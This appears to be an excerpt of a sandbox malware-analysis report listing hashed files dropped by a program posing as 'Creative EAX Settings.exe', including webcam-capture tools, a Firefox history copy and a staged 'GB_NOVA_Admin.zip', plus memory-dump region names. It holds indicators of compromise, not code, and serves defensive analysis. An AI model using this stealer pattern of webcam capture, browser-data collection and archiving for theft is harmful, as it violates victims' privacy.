SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar

MD5 46412670f90757a39c2425628ca7308b
SHA1 9867281235a1f815d92627a70ea3e9085d1bb79f
SHA256 52f4a7e4b2b87fa0ebd019ad24b83b1ef35eeae250cc8f18e50ca469bfa7d3cf
SHA512 9427e9d8315c34ca1e7e79ad31831fb5cf6e47aeb313ed660daaaeb97c54a8da36068e0a4988f956f2d598d88f80a6fafd21a06039eb621365b8606eded1720e

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

C:\Users\Admin\AppData\Local\Temp\nsb48B0.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

MD5 aa687c4a52fe7c51f02a773afdee3984
SHA1 8a1a74e57086e099e00758aa06260f3c31aea698
SHA256 5a723f275627664caaf827e3a2587febf33de532013749207cd7af1ca24d965a
SHA512 cbeef908f2190453e20ee0826b6ef5f3ca054a7b3ac72b8a7e3323d496dc362d0c8632a14aa8ad385488aa76247ca0c3d9763319e32e73b9e198487371f79243

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

MD5 15c0e0040c328569bdf818a1820515c8
SHA1 59ba821ee81c4fe00162e328a252c3d135cbd4fe
SHA256 d47e9d972092df09ff86aa6d25d86f6ddae6f806bd7f90062e5f5cc1429abb82
SHA512 a22f833ec2be93cc83b1338edc7966b5fa19d4dfac629fa3692b2f14042474d4116c2c83c3dce99c58c3ef7f90ba3e10fbbc57c02f29caac367a19c96b4fca89

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\icudtl.dat

MD5 a7d6ec3c81a4d76293eab4dd425074d6
SHA1 527a7ce5f97e976fc0336f9938d0180fe12c7015
SHA256 52c74fe5faa8646b5f652714352c67d5a6ddc3dcf6ccdc108d00a98c5348fbbd
SHA512 517d0b40d2b993ea39c330f5f408edd4b73b1628c75593fb7d1137e61f2c3d8e349964c13ca77af8612226962defd9779a2305128d4802656a3815b5a860aca3

memory/2660-3464-0x0000000000CC0000-0x0000000000D26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\resources\app.asar

MD5 fc3c5d2df0982333e7df9ad65f670f18
SHA1 beec1cb099a3b9fee45df0c3a1ff6e80bef57cc8
SHA256 7f946fe8104792a12393a3aafd63f301daa06f2dda0498ac8b7a6a8cd905f24c
SHA512 df5e55b839467b7e410dbf3b002c6dec5a75e0a32f08520e490dd2741bcb3ab5858db5d72c45e0d65349cd84ab8e98ca38d7294320860638a77f657a163db353

C:\Users\Admin\AppData\Local\Temp\d9602bfe-dea5-41f1-bbf4-2ab9417e4c39.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

C:\Users\Admin\AppData\Local\Temp\eb59fd39-768b-470d-85d1-4e5499a49cc6.tmp.node

MD5 d973217f06f98190161a84a2d2a969ab
SHA1 1647ee43e1d90dcdd56b5b5ee627f5b0d28dadce
SHA256 ba798e6f8036e7c3e874588f3f939d16e4121c72aa4e7acd15667112774413e1
SHA512 69b970858aaffd368b3174649c329539df65daf5fd8cad8e3d5f579fa253eae0dcd6e56f870884757d271f99ab922fe328f7d95a08d6c6ba6092beabae4220b1

memory/2188-3483-0x00007FFB68CE0000-0x00007FFB68CE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

MD5 b3841300e6fee8d60474cdef9d0c69ec
SHA1 05428dcf26397a584080f37665e692435e56c63f
SHA256 a018d53ad4ae177286b0415ba0c243484f75effa74f3fc9dfd6eb1e8f98dadb2
SHA512 064bacdc43b9c46e26784586c689b82ad8943a67bf517222112798bf013eb29599d987e158a945096f6c471123d3ac67d5363103a9c1e1172377ec5504283b1a

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\libGLESv2.dll

MD5 7eda02f572ed773a95e95c1faefab6d2
SHA1 7b709ff45ec0261888dcdc8448ac32da52f1d5b3
SHA256 00936f7be3f21f452e8b17bcb923a31eeb0495d6ab91b602a489530ecbccf8bb
SHA512 179211d7badffcb3abde8386f5e8636aa92c174269562a78c3b031577f6c2cb8736d68feac3c69de43deddb49e60fb26fd324989b0987db466fa09d804a41eba

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\libglesv2.dll

MD5 83fad7420f60f58e3e4f51299f3fd9d9
SHA1 6dc31980627f584e96a1238ab3fdce15456c48d2
SHA256 4fab5a91ef0caf067513d5f511e11f9c9da113164933ae0b8288d3f3c763058f
SHA512 380b0823b2c7239750a2cca7f9780d83599dee4effee7fec4b11afbb5226d31bb76785b22f1bcc460c4058244daaf37ed370f283e7552cf020720c5960bedc64

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\d3dcompiler_47.dll

MD5 00460c2cfd7459068ad5d1b6a5142cc7
SHA1 87b74b6b6ef9e1c1b2623a44977b6c9b7b4a17b3
SHA256 71c9ce833e589c3ec57683867387e8685a003290ef4e3898419d2a3da7dbf819
SHA512 05c4c783c72db44ff094d1e6f6fd5300f9caf9da7644bf4a38790bf94a8589eaacf53fb6007f137186c889a3b392fdecfc6a44d5b282576b2928591164993235

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\D3DCompiler_47.dll

MD5 7d80738060984d160fbf47fc59143ad4
SHA1 2843e76cd63b230baafaab48370566f5e5bb7b38
SHA256 75a24a4a143b1d97797bc98d1da57096d76560cd5594ea43fd8e1e00455304fd
SHA512 d2e51232161464c1aa340a9a92800001b146c6988df90a56e99da7718eefa5a57955fa0fd3f5f99a71b42562504e7f7fbd5a16e501f5d6fd5d830e9468bcea59

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpm42pod.hho.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1540-3512-0x000001F4E0C60000-0x000001F4E0C82000-memory.dmp

memory/1540-3513-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/1540-3514-0x000001F4E0CB0000-0x000001F4E0CC0000-memory.dmp

memory/1540-3515-0x000001F4E0CB0000-0x000001F4E0CC0000-memory.dmp

memory/1540-3519-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/5024-3521-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/5024-3531-0x000002660A7C0000-0x000002660A7D0000-memory.dmp

memory/5024-3532-0x000002660A7C0000-0x000002660A7D0000-memory.dmp

memory/5024-3535-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MCI3NK51VL9ERPFZJBYH.temp

MD5 52cd9373b8a6f271b65f81fb02d3c329
SHA1 93d374e3cf8f578bee3e531f050fc698e66be12d
SHA256 288da010db6a60da36a26ed01da5d9cc7ba174f888d305dff08362afe42801c7
SHA512 89bab2a31fc6525f92ef6f51350235179293b3f8473e7e2aa9a035988fbb40a697a6c104cd6d457ac6fa68e488a7a2068f85a034b14f57e95f9546c93a018c20

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2a7824481b8742991fbe9e89f1a226f6
SHA1 89f28cd20e3f5cfce0c2fe51db55857f4f398399
SHA256 9f339e7e82ae4b1b89436879a00eb9789697c677b38b0f73a0edb5ef8c6fc4a3
SHA512 db6ce6131c67e0380ef48e187d9c5d3604798b4849ddae9c98d2cce3abad6b5fcfb5d2078fc7a863268fd712a092f9159b3fc8bf1559668f6787822259e3bdc6

memory/2212-3599-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/2212-3600-0x000002AE75C20000-0x000002AE75C30000-memory.dmp

memory/1480-3601-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/4496-3611-0x000001FED2960000-0x000001FED2970000-memory.dmp

memory/4496-3612-0x000001FED2960000-0x000001FED2970000-memory.dmp

memory/1480-3613-0x00000270FBF10000-0x00000270FBF20000-memory.dmp

memory/1480-3614-0x00000270FBF10000-0x00000270FBF20000-memory.dmp

memory/5344-3629-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/5344-3643-0x000001AD69B00000-0x000001AD69B10000-memory.dmp

memory/5344-3644-0x000001AD69B00000-0x000001AD69B10000-memory.dmp

memory/3300-3645-0x000001B872600000-0x000001B872610000-memory.dmp

memory/2212-3646-0x000002AE75C20000-0x000002AE75C30000-memory.dmp

memory/4496-3656-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/3300-3657-0x00007FFB478C0000-0x00007FFB48381000-memory.dmp

memory/3300-3658-0x000001B872600000-0x000001B872610000-memory.dmp

memory/3300-3659-0x000001B872600000-0x000001B872610000-memory.dmp

memory/1480-3660-0x00000270FBF10000-0x00000270FBF20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

MD5 cd53674b12c748b469fdc3361a0362d3
SHA1 2f1daf22da5620bb58cbc68129edec6c25d2a377
SHA256 107ab1113e010ef09c47b397f82969c9c8caf295938ab4c2c531d2ec28ce6b5f
SHA512 a7d7b1b9d3a0e7289b184ab27f6212da5e7a65880375bb54a259def0c67a280bb893ec1ea4f3d00adaaa1c37165e67074a83d5e3246c39fda6f84650ac70bcd3

C:\Users\Admin\AppData\Local\Temp\33sN7DhO25fCsoJ0peG9\Logs\Error.nova

MD5 b697b37356ccd3fc63115453ac834bcf
SHA1 a628e8206d906249e51dc583ea32f4da7c872e40
SHA256 a9d0f86c4b62e910cc5ad830055d3d746664d1ece19b7b72e40da416184cda31
SHA512 83f8d1ab260632ea54b5c38ac763ba08d47fad52a9db02ea8b7e9f9c0d98f2bda9647c3f9bc07c7743889cb7df11c6f922e8f28ae207eeb1599ed1b98bad0c34

C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin.zip

MD5 b7e9385ab2ebc33bc7fcb88bc575e81c
SHA1 795909718c6a51306b6e2639e0548142cab11f31
SHA256 03bfc372cf4fa3865a76f7e054527b4264218bb94c3599ea7f5dec274103e7b7
SHA512 02606f4c5593cf766ef42076fbd01573b7201cbd00b8acaa2df14d078f5436ba1f06e8ea0ec728ab26cffb4f19c1458539f5d3da9729ebb899dcf64983480590

C:\Users\Admin\AppData\Local\Temp\ywsulwhqfl.gif

MD5 2c49243806beec50ad95774f41e42a49
SHA1 4755e071b958fcb26b95e8126711b5048087468a
SHA256 09831198f544822ae270fc943c24ab889f48fac3782460b4e2975ada0410eb54
SHA512 c41f3ab3afc8e61b28a4612c6e573023bfc85fc45ec182b5ce130cd632a36bd0a6c8d628e4eecc6393447b1976c9bcf10becb0d5bcc7afc822f582cff662b491

memory/4160-3867-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3868-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3869-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3878-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3879-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3880-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3881-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3882-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3888-0x00000154C9090000-0x00000154C9091000-memory.dmp

memory/4160-3889-0x00000154C9090000-0x00000154C9091000-memory.dmp